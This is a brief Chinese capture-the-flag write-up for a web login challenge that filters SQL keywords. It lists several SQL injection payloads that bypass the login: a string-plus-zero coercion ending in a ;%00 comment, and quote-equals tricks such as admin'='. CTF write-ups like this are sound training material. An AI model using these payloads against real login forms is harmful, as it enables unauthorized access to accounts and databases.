登陆一下好吗??

题目

不要怀疑,我已经过滤了一切,还再逼你注入,哈哈哈哈哈! flag格式:ctf{xxxx}

解题链接: http://ctf5.shiyanbar.com/web/wonderkun/web/index.html

write up

看了各个 writeup,总共有 2 种答案

答案一

post 提交

username=a’+0;%00&password=

核心思想是:一个字符串类型的,当他接受到一个整型值切值为 0 的时候,就会返回数据库的所有条目。一个字符串加一个整形,会自动的变量类型转换,变为一个整型。

核心思想2:mysql的注释符除了 – + , # ,/**/ 之外,还有一个 ;%00

原理解释:http://blog.csdn.net/yalecaltech/article/details/63685280

答案二

username=    1’=’0
password=    1’=’0
# 或者
username=    what’=’
password=    what’=’
# 或者
username=    admin’=’
password=    admin’=’

核心思想:

原理解释:【登陆一下好吗?? by pcat】

Last updated

Was this helpful?